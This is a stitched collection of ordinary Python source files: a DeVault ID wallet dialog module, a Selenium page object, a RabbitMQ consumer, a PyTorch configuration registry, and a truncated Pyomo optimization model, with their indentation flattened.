return item[:-1]
def lookup_cash_account_dialog(
parent, wallet, *, # parent and wallet are required and parent must be an ElectrumWindow instance.
title: str = None, # the title to use, defaults to "Lookup DeVault ID" (translated) and is bold and larger. Can be rich text.
blurb: str = None, # will appear in the same label, can be rich text, will get concatenated to title.
title_label_link_activated_slot: Callable[[str], None] = None, # if you embed links in the blub, pass a callback to handle them
button_type: InfoGroupBox.ButtonType = InfoGroupBox.ButtonType.NoButton, # see InfoGroupBox
add_to_contacts_button: bool = False, # if true, the button bar will include an add to contacts button
pay_to_button: bool = False # if true, the button bar will include a "pay to" button
) -> List[Tuple[cashacct.Info, str, str]]: # Returns a list of tuples
''' Shows the generic DeVault ID lookup interface. '''
from .main_window import ElectrumWindow
ok_disables = button_type != InfoGroupBox.ButtonType.NoButton
title = title or _("Lookup DeVault ID")
blurb = blurb or ''
assert isinstance(parent, ElectrumWindow) and isinstance(wallet, Abstract_Wallet)
if parent.gui_object.warn_if_no_network(parent):
return None
d = WindowModalDialog(parent.top_level_window(), title)
d.setObjectName("WindowModalDialog - " + title)
finalization_print_error(d)
destroyed_print_error(d)
all_cashacct_contacts = set(contact.name for contact in wallet.contacts.get_all(nocopy=True) if contact.type == 'cashacct')
vbox = QVBoxLayout(d)
hbox = QHBoxLayout()
label = QLabel()
label.setPixmap(QIcon(":icons/cashacct-logo.png").pixmap(50))
hbox.addWidget(label)
hbox.addItem(QSpacerItem(10, 1))
label = QLabel("<font size=+1><b>" + title + "</b></font>" + blurb)
if callable(title_label_link_activated_slot):
label.linkActivated.connect(title_label_link_activated_slot)
label.setAlignment(Qt.AlignVCenter|Qt.AlignLeft)
hbox.addWidget(label)
hbox.addStretch(2)
vbox.addLayout(hbox)
grid = QGridLayout()
grid.setContentsMargins(62, 32, 12, 12)
acct = QLineEdit()
acct.setPlaceholderText(_("DeVault ID e.g. satoshi#123.45"))
acct.setMinimumWidth(280)
label2 = WWLabel('<a href="https://www.devaultid.com/#lookup">' + _("Search online...") + "</a>")
label2.linkActivated.connect(webopen)
#acct.setFixedWidth(280)
label = HelpLabel(_("&DeVault ID Name"), _("Enter a DeVault ID name of the form Name#123.45, and Electron Cash will search for the contact and present you with its resolved address."))
label.setBuddy(acct)
search = QPushButton(_("Lookup"))
search.setEnabled(False)
grid.addWidget(label, 0, 0, 1, 1, Qt.AlignRight)
grid.addWidget(acct, 0, 1, 1, 1, Qt.AlignLeft)
grid.addWidget(search, 0, 2, 1, 1, Qt.AlignLeft)
grid.addWidget(label2, 0, 3, 1, 1, Qt.AlignLeft)
grid.setColumnStretch(3, 5)
vbox.addLayout(grid)
vbox.addItem(QSpacerItem(20,10))
frame = QScrollArea()
tit_lbl = QLabel()
vbox.addWidget(tit_lbl)
extra_buttons = []
# Extra Buttons
if add_to_contacts_button:
def create_add_to_contacts_button_callback(item: tuple) -> QPushButton:
info, min_chash, ca_string = item
ca_string_em = wallet.cashacct.fmt_info(info, min_chash, emoji=True)
but = QPushButton(QIcon(":icons/tab_contacts.png"), "")
if isinstance(info.address, Address):
if ca_string in all_cashacct_contacts or wallet.is_mine(info.address):
but.setDisabled(True)
but.setToolTip(_('<span style="white-space:nowrap"><b>{cash_account}</b> already in Contacts</span>').format(cash_account=ca_string_em))
else:
add_str = _("Add to Contacts")
but.setToolTip(f'<span style="white-space:nowrap">{add_str}<br> <b>{ca_string_em}</b></span>')
del add_str
def add_contact_slot(ign=None, but=but, item=item):
# label, address, typ='address') -> str:
new_contact = parent.set_contact(label=ca_string, address=info.address, typ='cashacct')
if new_contact:
msg = _('<span style="white-space:nowrap"><b>{cash_account}</b> added to Contacts</span>').format(cash_account=ca_string_em)
but.setDisabled(True)
but.setToolTip(msg)
all_cashacct_contacts.add(new_contact.name)
else:
msg = _("Error occurred adding to Contacts")
QToolTip.showText(QCursor.pos(), msg, frame, QRect(), 5000)
# /add_contact
but.clicked.connect(add_contact_slot)
else:
but.setDisabled(True)
but.setToolTip("<i>" + _("Unsupported Account Type") + "</i>")
return but
extra_buttons.append(create_add_to_contacts_button_callback)
if pay_to_button:
def create_payto_but(item):
info, min_chash, ca_string = item
ca_string_em = wallet.cashacct.fmt_info(info, min_chash, emoji=True)
icon_file = ":icons/paper-plane.svg" if not ColorScheme.dark_scheme else ":icons/paper-plane_dark_theme.svg"
but = QPushButton(QIcon(icon_file), "")
if isinstance(info.address, Address):
payto_str = _("Pay to")
but.setToolTip(f'<span style="white-space:nowrap">{payto_str}<br> <b>{ca_string_em}</b></span>')
but.clicked.connect(lambda: parent.is_alive() and parent.payto_payees([ca_string_em]))
but.clicked.connect(d.reject)
else:
but.setDisabled(True)
but.setToolTip("<i>" + _("Unsupported Account Type") + "</i>")
return but
extra_buttons.append(create_payto_but)
# /Extra Buttons
ca = InfoGroupBox(frame, parent, button_type = button_type, title = '', extra_buttons=extra_buttons)
ca.refresh()
frame.setMinimumWidth(765)
frame.setMinimumHeight(250)
frame.setWidget(ca)
frame.setWidgetResizable(True)
vbox.addWidget(frame)
search.setDefault(True)
if ok_disables:
need_to_fwd_return = True
ok = OkButton(d)
ok.setDisabled(ok_disables)
vbox.addLayout(Buttons(CancelButton(d), ok))
else:
need_to_fwd_return = False
ok = CloseButton(d)
ok.setDefault(False)
vbox.addLayout(Buttons(ok))
def ca_msg(m, clear=False):
ca.no_items_text = m
if clear:
ca.setItems([], auto_resize_parent=False, title = '')
else:
ca.refresh()
tit_lbl.setText('')
def on_return_pressed():
if need_to_fwd_return and search.isEnabled():
search.click()
def on_text_changed(txt):
txt = txt.strip() if txt else ''
search.setEnabled(bool(wallet.cashacct.parse_string(txt)))
if not txt and not ca.items():
ca_msg(" ")
def on_search():
ok.setDisabled(ok_disables)
name = acct.text().strip()
tup = wallet.cashacct.parse_string(name)
if tup:
ca_msg(_("Searching for <b>{cash_account_name}</b> please wait ...").format(cash_account_name=name), True)
results = None
exc = []
t0 = time.time()
def resolve_verify():
nonlocal results
results = wallet.cashacct.resolve_verify(name, exc=exc)
code = VerifyingDialog(parent.top_level_window(),
_("Verifying DeVault ID {name} please wait ...").format(name=name),
resolve_verify, auto_show=False).exec_()
if code == QDialog.Rejected:
                # user cancel -- the waiting dialog thread keeps running in the background, but that's OK; it will be a no-op
d.reject()
return
if results:
ca.setItems(results, auto_resize_parent=False, title='', button_type = button_type) # suppress groupbox title
else:
ca_msg(_("The specified DeVault ID does not appear to be associated with any address"), True)
if time.time()-t0 >= cashacct.timeout:
if (wallet.verifier and wallet.synchronizer and # check these are still alive: these could potentially go away from under us if wallet is stopped when we get here.
(not wallet.verifier.is_up_to_date() or not wallet.synchronizer.is_up_to_date())):
parent.show_message(_("No results found. However, your wallet is busy updating."
" This can interfere with DeVault ID lookups."
" You may want to try again when it is done."))
else:
parent.show_message(_("A network timeout occurred while looking up this DeVault ID. "
"You may want to check that your internet connection is up and "
"not saturated processing other requests."))
elif exc and isinstance(exc[-1], requests.ConnectionError):
parent.show_error(_("A network connectivity error occured. Please check your internet connection and try again."))
nres = len(results or [])
title = "<b>" + name + "</b> - " + ngettext("{number} DeVault ID", "{number} DeVault IDs", nres).format(number=nres)
tit_lbl.setText(title)
else:
ca_msg(_("Invalid DeVault ID name, please try again"), True)
acct.textChanged.connect(on_text_changed)
search.clicked.connect(on_search)
acct.returnPressed.connect(on_return_pressed)
ca.buttonGroup().buttonClicked.connect(lambda x=None: ok.setEnabled(ok_disables and ca.selectedItem() is not None))
ca_msg(" ")
if d.exec_() == QDialog.Accepted:
return ca.selectedItems()
return None
def cash_account_detail_dialog(parent : MessageBoxMixin, # Should be an ElectrumWindow instance
                               ca_string : str, # Cash account string, e.g. "satoshi#123.1"
*, title : str = None # The modal dialog window title
) -> bool: # returns True on success, False on failure
''' Shows the DeVault ID details for any cash account.
    Note that parent should be an ElectrumWindow instance.
`ca_string` is just a DeVault ID string of the form:
name#number[.collision_hash_prefix]
Returns False on failure or True on success. User is presented with an error
message box on False return.'''
from .main_window import ElectrumWindow
assert isinstance(parent, ElectrumWindow)
wallet = parent.wallet
assert isinstance(wallet, Abstract_Wallet)
if not wallet.cashacct.parse_string(ca_string):
parent.show_error(_("Invalid DeVault ID:") + f" {ca_string}")
return False
ca_string = wallet.cashacct.strip_emoji(ca_string)
# validate ca_string arg & resolve if need be
info = wallet.cashacct.get_verified(ca_string)
if not info:
# need to look it up
        tup = resolve_cashacct(parent, ca_string, wallet)
if not tup:
# Error window was provided by resolve_cashacct, just return
return False
info, ca_string = tup
ca_string_em = ca_string + f" {info.emoji}"
parsed = wallet.cashacct.parse_string(ca_string)
assert parsed
minimal_chash = parsed[-1]
    # At this point we have a verified cash account to display.
# Make sure it's not an unsupported type as the code at the end of this
# file assumes info.address is an Address.
if not isinstance(info.address, Address):
parent.show_error(_("Unsupported payment data type.") + "\n\n"
+ _("The DeVault ID {name} uses an account type that "
"is not supported by Electron Cash.").format(name=ca_string))
return False
title = title or _("DeVault ID Details")
# create dialog window
d = WindowModalDialog(parent.top_level_window(), title)
d.setObjectName("WindowModalDialog - " + title)
finalization_print_error(d)
destroyed_print_error(d)
grid = QGridLayout(d)
em_lbl = QLabel(f'<span style="white-space:nowrap; font-size:75pt;">{info.emoji}</span>')
em_lbl.setToolTip(f'<span style="white-space:nowrap;">{ca_string_em}</span>')
grid.addWidget(em_lbl, 0, 0, 3, 1)
fsize = 26
if len(info.name) > 20:
fsize = 15
if len(info.name) > 30:
fsize = 12
if len(info.name) > 50:
fsize = 10
if len(info.name) > 90:
fsize = 8
name_txt = f'<span style="white-space:nowrap; font-size:{fsize}pt; font-weight:bold;">{info.name}<span style="font-size:18pt;">#{info.number}.'
if minimal_chash:
name_txt += f'{minimal_chash}'
name_txt += '</span></span>'
if len(minimal_chash) < len(info.collision_hash):
if not info.collision_hash.startswith(minimal_chash):
parent.print_error(f"WARNING: {ca_string} minimal_chash {minimal_chash} and collision_hash {info.collision_hash} mismatch!")
else:
extra = info.collision_hash[len(minimal_chash):]
name_txt += f'<span style="white-space:nowrap; font-size:11pt; font-weight:200;"><i>{extra}</i></span>'
def open_link(link):
if Address.is_valid(link):
addr = Address.from_string(link)
if wallet.is_mine(addr):
parent.show_address(addr)
else:
addr_URL = web.BE_URL(parent.config, 'addr', addr)
if addr_URL:
webopen(addr_URL)
return
if link.startswith('http'):
webopen(link)
elif len(link) == 64: # 64 character txid
tx = wallet.transactions.get(link)
if tx:
parent.show_transaction(tx, tx_desc=wallet.get_label(link))
else:
parent.do_process_from_txid(txid=link, tx_desc=wallet.get_label(link))
return
# name
name_lbl = QLabel(name_txt)
grid.addWidget(name_lbl, 0, 1, 1, 1)
# copy name
copy_name_but = QPushButton()
copy_name_but.setIcon(QIcon(":icons/copy.png"))
button_make_naked(copy_name_but)
copy_name_but.setToolTip('<span style="white-space:nowrap">'
+ _("Copy <b>{cash_account_name}</b>").format(cash_account_name=ca_string_em)
+ '</span>')
copy_name_but.clicked.connect(lambda ignored=None, ca_string_em=ca_string_em, copy_but=copy_name_but:
parent.copy_to_clipboard(text=ca_string_em, tooltip=_('DeVault ID copied to clipboard'), widget=copy_but) )
grid.addWidget(copy_name_but, 0, 2, 1, 1)
# address label
addr_lbl = QLabel(f'<span style="white-space:nowrap; font-size:15pt;"><a href="{info.address.to_ui_string()}"><pre>{info.address.to_ui_string()}</pre></a></span>')
addr_lbl.linkActivated.connect(open_link)
grid.addWidget(addr_lbl, 1, 1, 1, 1)
# copy address label
copy_addr_but = QPushButton()
copy_addr_but.setIcon(QIcon(":icons/copy.png"))
button_make_naked(copy_addr_but)
copy_addr_but.setToolTip(_("Copy {}").format(_("Address")))
copy_addr_but.clicked.connect(lambda ignored=None, text=info.address.to_ui_string(), copy_but=copy_addr_but:
parent.copy_to_clipboard(text=text, tooltip=_('Address copied to clipboard'), widget=copy_but) )
grid.addWidget(copy_addr_but, 1, 2, 1, 1)
if not wallet.is_mine(info.address):
ismine_txt = _("External Address") + ', '
else:
ismine_txt = ''
# Mined in block
viewtx_txt = _("Mined in block")
view_tx_lbl = QLabel(f'<span style="white-space:nowrap; font-size:11pt;">{ismine_txt}{viewtx_txt}: <a href="{info.txid}">{cashacct.num2bh(info.number)}</a></span>')
view_tx_lbl.setToolTip(_("View Registration Transaction"))
view_tx_lbl.linkActivated.connect(open_link)
grid.addWidget(view_tx_lbl, 2, 1, 1, 1, Qt.AlignTop | Qt.AlignRight)
grid.setRowStretch(2, 1)
# QR
tabs = QTabWidget()
full_addr_str = info.address.to_full_ui_string()
qr_address = QRCodeWidget(full_addr_str, fixedSize=True)
qr_address.setToolTip(full_addr_str)
tabs.addTab(qr_address, _("Address"))
qr_ca_string = QRCodeWidget(ca_string, fixedSize=True)
qr_ca_string.setToolTip(ca_string)
tabs.addTab(qr_ca_string, _("DeVault ID"))
qr_address.setMinimumSize(300, 300)
qr_ca_string.setMinimumSize(300, 300)
grid.addWidget(tabs, 3, 0, 1, -1, Qt.AlignTop | Qt.AlignHCenter)
def_but = QPushButton()
mk_def_txt = _("Make default for address")
is_def_txt = _("Is default for address")
mk_def_tt = _("Make this DeVault ID the default for this address")
is_def_tt = _("DeVault ID has been made the default for this address")
def make_default():
wallet.cashacct.set_address_default(info)
parent.ca_address_default_changed_signal.emit(info) # updates all concerned widgets, including self
tt = is_def_txt
QToolTip.showText(QCursor.pos(), tt, def_but)
def update_def_but(new_def):
if new_def and new_def.address != info.address:
# not related, abort
return
if new_def != info:
def_but.setDisabled(False)
def_but.setText(mk_def_txt)
def_but.setToolTip(mk_def_tt)
else:
def_but.setDisabled(True)
def_but.setText(is_def_txt)
def_but.setToolTip(is_def_tt)
def_but.clicked.connect(make_default)
infos = wallet.cashacct.get_cashaccounts([info.address])
def_now = infos and wallet.cashacct.get_address_default(infos)
if wallet.is_mine(info.address):
update_def_but(def_now)
else:
def_but.setHidden(True) # not related to wallet, hide the button
del infos, def_now
# Bottom buttons
buttons = Buttons(def_but, OkButton(d))
grid.addLayout(buttons, 4, 0, -1, -1)
# make all labels allow select text & click links
for c in d.children():
if isinstance(c, QLabel):
c.setTextInteractionFlags(c.textInteractionFlags() | Qt.TextSelectableByMouse | Qt.LinksAccessibleByMouse)
try:
parent.ca_address_default_changed_signal.connect(update_def_but)
d.exec_()
finally:
# Unconditionally detach slot to help along Python GC
try: parent.ca_address_default_changed_signal.disconnect(update_def_but)
except TypeError: pass
return True
|
from urllib import parse
from pages.group_page import GroupPage
from pages.my_groups_components import GroupCreateDialog, GroupCreateButton
from pages.page import Page
class MyGroupsPage(Page):
def create_public_page(self, description: dict) -> GroupPage:
self.group_create_button.click()
create_dialog = GroupCreateDialog(self.driver)
create_dialog.choose_public_page(description)
path = parse.urlparse(self.driver.current_url).path
return GroupPage(self.driver, path=path)
@property
def group_create_button(self) -> GroupCreateButton:
return GroupCreateButton(self.driver)
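# Usage sketch (assumes an authenticated selenium `driver` already on the
# "my groups" page; the description keys are hypothetical and depend on what
# GroupCreateDialog.choose_public_page expects):
#
#   page = MyGroupsPage(driver)
#   group_page = page.create_public_page({"title": "QA sandbox"})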
|
import json
import pathlib
import pika
from app.utils.config import SETTINGS
from app.utils.logger import logger
USERNAME = SETTINGS.rabbitmq_default_user
PASSWORD = SETTINGS.rabbitmq_default_pass
HOST = SETTINGS.rabbitmq_host
RABBITMQ_CONNECTION_ATTEMPTS = SETTINGS.rabbitmq_connection_attempts
RABBITMQ_RETRY_DELAY = SETTINGS.rabbitmq_retry_delay
QUEUE_NAME = SETTINGS.rabbitmq_queue_name
OUTPUT_FILE = pathlib.Path().absolute() / 'output.txt'
FILE = None
def callback(
ch: pika.adapters.blocking_connection.BlockingChannel,
method: pika.spec.Basic.Deliver,
properties: pika.spec.BasicProperties,
body: bytes
):
"""
Callback function to consume message from the queue.
Collects message and saves to OUTPUT_FILE.
"""
try:
element = json.loads(body)
if FILE is not None:
FILE.writelines([json.dumps(element), '\n'])
ch.basic_ack(delivery_tag=method.delivery_tag)
logger.info(f' [✓] Received {body!r} on queue {QUEUE_NAME}')
except json.decoder.JSONDecodeError:
ch.basic_nack(delivery_tag=method.delivery_tag, requeue=False)
logger.info(f' [x] Rejected {body!r} on queue {QUEUE_NAME}')
def consume_queue():
"""Consumes from the queue using the callback."""
credentials = pika.PlainCredentials(USERNAME, PASSWORD)
connection = pika.BlockingConnection(
pika.ConnectionParameters(
host=HOST,
credentials=credentials,
connection_attempts=RABBITMQ_CONNECTION_ATTEMPTS,
retry_delay=RABBITMQ_RETRY_DELAY,
)
)
channel = connection.channel()
logger.info(f'Connected pika consumer to {HOST}')
channel.queue_declare(queue=QUEUE_NAME, durable=True)
channel.basic_consume(
queue=QUEUE_NAME,
on_message_callback=callback
)
logger.info(' [*] Waiting for messages on queue.')
try:
channel.start_consuming()
except KeyboardInterrupt:
pass
except Exception as e:
logger.exception(e)
finally:
        if channel.is_open:
            channel.close()
            logger.debug('channel closed')
        if connection.is_open:
            connection.close()
            logger.debug('connection closed')
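# Producer-side sketch (uses the same SETTINGS; messages must be valid JSON or
# the callback above will nack and drop them):
#
#   credentials = pika.PlainCredentials(USERNAME, PASSWORD)
#   connection = pika.BlockingConnection(
#       pika.ConnectionParameters(host=HOST, credentials=credentials))
#   channel = connection.channel()
#   channel.queue_declare(queue=QUEUE_NAME, durable=True)
#   channel.basic_publish(exchange='', routing_key=QUEUE_NAME,
#                         body=json.dumps({'event': 'ping'}))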
if __name__ == '__main__':
FILE = open(OUTPUT_FILE, 'a', buffering=1)
consume_queue()
if FILE is not None:
FILE.close()
logger.debug(f'{OUTPUT_FILE} closed')
|
# Copyright 2020 winshare
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# **************************************************************************** #
# #
# ::: :::::::: #
# description.py :+: :+: :+: #
# +:+ +:+ +:+ #
# By: winshare <winshare@student.42.fr> +#+ +:+ +#+ #
# +#+#+#+#+#+ +#+ #
# Created: 2020/06/08 15:42:45 by winshare #+# #+# #
# Updated: 2020/06/08 15:42:45 by winshare ### ########.fr #
# #
# **************************************************************************** #
from Data.DataSets.NPY.segmentation_dataset import Costum_NPY_DataSet
from Data.DataSets.CitysCapes.cityscapes import CityscapesSegmentation
from Data.DataSets.COCO.coco import CocoDataset
from Data.DataSets.PascalVoc.pascal import VOCSegmentation
from Src.Nets.BackBone.efficientnet.model import EfficientNet
from Src.Nets.BackBone.xception import AlignedXception as xception
from Src.Nets.BackBone.mobilenetv3 import MobileNetV3_Large,MobileNetV3_Small
import torchvision.models as models
import torchvision.datasets as dataset
import torch.optim as optim
import torch.nn as nn
import torch.nn.functional as F
class Description():
def __init__(self):
# ---------------------------------------------------------------------------- #
# Pytorch Function Dictionary #
# ---------------------------------------------------------------------------- #
self.datasets_function_dict={
"Classification":{
"MINST":dataset.MNIST,
"FashionMINST":dataset.FashionMNIST,
"KMINST":dataset.KMNIST,
"EMINST":dataset.EMNIST,
"CIFAR10":dataset.CIFAR10,
"CIFAR100":dataset.CIFAR100,
"ImageNet":dataset.ImageNet
},
"Detection":{
"CocoDetection":CocoDataset,
"VOC_Detection":dataset.VOCDetection
},
"Segmentation":{
"VOC_Segmentation":dataset.VOCSegmentation,
"Cityscapes":dataset.Cityscapes,
"Costum_NPY_DataSet":Costum_NPY_DataSet,
"CocoSegmentation":CocoDataset
},
"Caption":{
"CocoCaptions":dataset.CocoCaptions
},
"InstenceSegmentation":{
"CocoDetection":CocoDataset
}
}
self.dataset_support_list=self.datasets_function_dict.keys()
self.OptimDict={
"SGD":optim.SGD,
"ASGD":optim.ASGD,
"Adam":optim.Adam,
"Adadelta":optim.Adadelta,
"Adagrad":optim.Adagrad,
"AdamW":optim.AdamW,
"LBFGS":optim.LBFGS,
"RMSprop":optim.RMSprop,
"SparseAdam":optim.SparseAdam,
"Adamax":optim.Adamax
}
self.Loss_Function_Dict={
"AdaptiveLogSoftmaxWithLoss":nn.AdaptiveLogSoftmaxWithLoss
,"BCELoss":nn.BCELoss
,"BCEWithLogitsLoss":nn.BCEWithLogitsLoss
,"CosineEmbeddingLoss":nn.CosineEmbeddingLoss
,"CrossEntropyLoss":nn.CrossEntropyLoss
,"CTCLoss":nn.CTCLoss
,"cosine_embedding_loss":F.cosine_embedding_loss
,"ctc_loss":F.ctc_loss
,"hinge_embedding_loss":F.hinge_embedding_loss
,"l1_loss":F.l1_loss
,"margin_ranking_loss":F.margin_ranking_loss
,"mse_loss":F.mse_loss
,"multi_margin_loss":F.mse_loss
,"multilabel_margin_loss":F.multilabel_margin_loss
,"multilabel_soft_margin_loss":F.multilabel_margin_loss
,"nll_loss":F.nll_loss
,"poisson_nll_loss":F.poisson_nll_loss
,"smooth_l1_loss":F.smooth_l1_loss
,"soft_margin_loss":F.soft_margin_loss
,"triplet_margin_loss":F.triplet_margin_loss
,"HingeEmbeddingLoss":nn.HingeEmbeddingLoss
,"KLDivLoss":nn.KLDivLoss
,"L1Loss":nn.L1Loss
,"MarginRankingLoss":nn.MarginRankingLoss
,"MSELoss":nn.MSELoss
,"MultiLabelMarginLoss":nn.MultiLabelMarginLoss
,"MultiLabelSoftMarginLoss":nn.MultiLabelSoftMarginLoss
,"MultiMarginLoss":nn.MultiMarginLoss
,"NLLLoss":nn.MultiMarginLoss
,"PoissonNLLLoss":nn.PoissonNLLLoss
,"SmoothL1Loss":nn.SmoothL1Loss
,"SoftMarginLoss":nn.SoftMarginLoss
,"TripletMarginLoss":nn.TripletMarginLoss
}
self.Lr_Dict={
"StepLR":optim.lr_scheduler.StepLR,
"MultiStepLR":optim.lr_scheduler.MultiStepLR,
"ExponentialLR":optim.lr_scheduler.ExponentialLR,
"CosineAnnealingLR":optim.lr_scheduler.CosineAnnealingLR,
"ReduceLROnPlateau":optim.lr_scheduler.ReduceLROnPlateau,
"CyclicLR":optim.lr_scheduler.CyclicLR,
"OneCycleLR":optim.lr_scheduler.OneCycleLR,
"CosineAnnealingWarmRestarts":optim.lr_scheduler.CosineAnnealingWarmRestarts
}
self.BackBoneDict={
# ------------------------------ Official Model ------------------------------ #
"resnet18" :models.resnet18,
"alexnet" :models.alexnet,
"vgg16" :models.vgg16,
"squeezenet":models.squeezenet1_0,
"densenet": models.densenet161,
"inception":models.inception_v3,
"googlenet ": models.googlenet,
"shufflenet ":models.shufflenet_v2_x1_0,
"mobilenet ": models.mobilenet_v2,
"resnext50_32x4d":models.resnext50_32x4d,
"wide_resnet50_2" :models.wide_resnet50_2,
"mnasnet": models.mnasnet1_0,
# ------------------------------- Custom Model ------------------------------- #
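            # Note: EfficientNet.from_name() builds each model eagerly, so all
            # eight EfficientNet variants are constructed at Description() init,
            # unlike the torchvision entries above, which are constructor references.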
'efficientnet-b0':EfficientNet.from_name('efficientnet-b0'),
'efficientnet-b1':EfficientNet.from_name('efficientnet-b1'),
'efficientnet-b2':EfficientNet.from_name('efficientnet-b2'),
'efficientnet-b3':EfficientNet.from_name('efficientnet-b3'),
'efficientnet-b4':EfficientNet.from_name('efficientnet-b4'),
'efficientnet-b5':EfficientNet.from_name('efficientnet-b5'),
'efficientnet-b6':EfficientNet.from_name('efficientnet-b6'),
'efficientnet-b7':EfficientNet.from_name('efficientnet-b7'),
"xception":xception,
"mobilenetv3_s":MobileNetV3_Small,
"mobilenetv3_l":MobileNetV3_Large
}
"""
update plan :
* ResNest(https://github.com/zhanghang1989/ResNeSt.git)
* DetectorRS(https://github.com/joe-siyuan-qiao/DetectoRS.git)
"""
# ---------------------------------------------------------------------------- #
# The Custom Network for different mission like : #
# ---------------------------------------------------------------------------- #
"""
### Detection:
* Yolov3(https://github.com/ayooshkathuria/pytorch-yolo-v3)
* Cascade FPN RCNN()
* EfficientDet(https://github.com/zylo117/Yet-Another-EfficientDet-Pytorch.git)
### Semantic Segmentation
* [Deeplab(DeepLab_ResNeSt269_PContext)](https://hangzhang.org/PyTorch-Encoding/model_zoo/segmentation.html)
### Instance Segmentation
* YOLACT(https://github.com/dbolya/yolact.git)
"""
self.DetectionDict={
}
self.InstanceSegmentationDict={
}
print("# ---------------------------------------------------------------------------- #")
print("# Description Init Done #")
print("# ---------------------------------------------------------------------------- #")
|
# MINLP written by GAMS Convert at 04/21/18 13:54:22
#
# Equation counts
# Total E G L N X C B
# 85 29 0 56 0 0 0 0
#
# Variable counts
# x b i s1s s2s sc si
# Total cont binary integer sos1 sos2 scont sint
# 217 33 184 0 0 0 0 0
# FX 0 0 0 0 0 0 0 0
#
# Nonzero counts
# Total const NL DLL
# 657 633 24 0
#
# Reformulation has removed 1 variable and 1 equation
from pyomo.environ import *
model = m = ConcreteModel()
# Binary decision variables b1..b184 (collapsed from 184 identical lines;
# setattr preserves the original attribute names m.b1 ... m.b184)
for _i in range(1, 185):
    setattr(m, 'b%d' % _i, Var(within=Binary,bounds=(0,1),initialize=0))
# Nonnegative continuous variables x185..x216 (collapsed from 32 identical lines)
for _i in range(185, 217):
    setattr(m, 'x%d' % _i, Var(within=Reals,bounds=(0,None),initialize=0))
m.obj = Objective(expr= 111.366069033018*m.b1 + 173.736682895127*m.b2 + 206.584137827711*m.b3 + 311.192639215759*m.b4
+ 391.096663187392*m.b5 + 412.724041015689*m.b6 + 362.90703724183*m.b7 + 412.238377551605*m.b8
+ 202.33239914492*m.b9 + 206.873035263351*m.b10 + 459.424203486646*m.b11
+ 436.382257935297*m.b12 + 595.212791352102*m.b13 + 554.589535228908*m.b14
+ 561.749361850176*m.b15 + 581.529277658138*m.b16 + 530.881632918085*m.b17
+ 536.948983658504*m.b18 + 325.467953593857*m.b19 + 315.525067375426*m.b20
+ 76.225942040435*m.b21 + 254.905793105451*m.b22 + 113.004738070171*m.b23
+ 177.189040572114*m.b24 + 173.894920684095*m.b25 + 152.600290074966*m.b26
+ 204.409857240935*m.b27 + 16.5055441265287*m.b28 + 138.719762707452*m.b29
+ 72.1288414712326*m.b30 + 120.847015325226*m.b31 + 99.571165171974*m.b32
+ 151.849080781614*m.b33 + 145.681002740026*m.b34 + 319.104683215451*m.b35
+ 286.753801045421*m.b36 + 393.925160475677*m.b37 + 359.934057246776*m.b38
+ 372.757367428863*m.b39 + 380.320704273821*m.b40 + 209.897358368756*m.b41
+ 176.903014825797*m.b42 + 484.441224042163*m.b43 + 386.398700662687*m.b44
+ 569.816540558016*m.b45 + 500.146929279378*m.b46 + 536.081866783575*m.b47
+ 538.164119624621*m.b48 + 472.75417976903*m.b49 + 394.671861667082*m.b50
+ 661.778650400896*m.b51 + 311.233594837076*m.b52 + 537.233382862136*m.b53
+ 352.610164566948*m.b54 + 508.430479292237*m.b55 + 433.246268236365*m.b56
+ 240.434688571414*m.b57 + 247.573379889676*m.b58 + 140.125745864737*m.b59
+ 129.619586841229*m.b60 + 95.259779915922*m.b61 + 157.318586867059*m.b62
+ 70.3512639139942*m.b63 + 129.990055093272*m.b64 + 243.357134921591*m.b65
+ 304.003791259259*m.b66 + 387.22826595551*m.b67 + 513.078195638243*m.b68
+ 616.876803085642*m.b69 + 635.234357536375*m.b70 + 584.514585206566*m.b71
+ 639.355553242285*m.b72 + 471.729855743646*m.b73 + 557.923885983252*m.b74
+ 106.468143550206*m.b75 + 576.327451798806*m.b76 + 526.167479727853*m.b77
+ 684.640492332848*m.b78 + 496.847481320222*m.b79 + 632.720138765642*m.b80
+ 349.132941483343*m.b81 + 328.586110112758*m.b82 + 615.607044330971*m.b83
+ 537.140113127724*m.b84 + 717.322415523131*m.b85 + 647.481188136546*m.b86
+ 684.12778533852*m.b87 + 686.401242893627*m.b88 + 506.816284666641*m.b89
+ 398.035848133399*m.b90 + 855.431776792172*m.b91 + 471.606942587939*m.b92
+ 801.214873020304*m.b93 + 596.722224078614*m.b94 + 753.768882151975*m.b95
+ 691.333659314473*m.b96 + 85.3675502274446*m.b97 + 158.379394593169*m.b98
+ 257.300026361108*m.b99 + 320.704543355031*m.b100 + 448.126320657674*m.b101
+ 457.763772256702*m.b102 + 408.83386135894*m.b103 + 463.255868286668*m.b104
+ 237.144352702819*m.b105 + 177.481389098916*m.b106 + 528.418902427793*m.b107
+ 367.481249017807*m.b108 + 581.69455257316*m.b109 + 486.218458446561*m.b110
+ 545.202814571382*m.b111 + 534.842653535173*m.b112 + 273.315651326331*m.b113
+ 294.736877404174*m.b114 + 91.5634612712189*m.b115 + 207.431742416254*m.b116
+ 131.445214576321*m.b117 + 232.45283126314*m.b118 + 119.004267377741*m.b119
+ 195.036716336294*m.b120 + 382.803613122328*m.b121 + 467.001607601617*m.b122
+ 186.213458590968*m.b123 + 547.081668156355*m.b124 + 541.160249117729*m.b125
+ 656.49566392312*m.b126 + 512.884098066802*m.b127 + 621.549425681682*m.b128
+ 181.371452020713*m.b129 + 175.492124453316*m.b130 + 162.248252595624*m.b131
+ 55.0280789945633*m.b132 + 114.798088119326*m.b133 + 107.382697687723*m.b134
+ 90.3342797608636*m.b135 + 106.314336443356*m.b136 + 221.180367269329*m.b137
+ 200.830918650843*m.b138 + 420.854797821172*m.b139 + 351.4013073243*m.b140
+ 486.967847106279*m.b141 + 432.551908850222*m.b142 + 462.429481904519*m.b143
+ 462.157040602356*m.b144 + 181.09388190356*m.b145 + 223.750754907429*m.b146
+ 118.11570891131*m.b147 + 279.735432351987*m.b148 + 287.185185564983*m.b149
+ 336.883342353846*m.b150 + 272.594688961982*m.b151 + 322.770119748047*m.b152
+ 326.795248361408*m.b153 + 271.173036007453*m.b154 + 758.353052369709*m.b155
+ 597.043789091874*m.b156 + 887.286114762329*m.b157 + 775.415492640821*m.b158
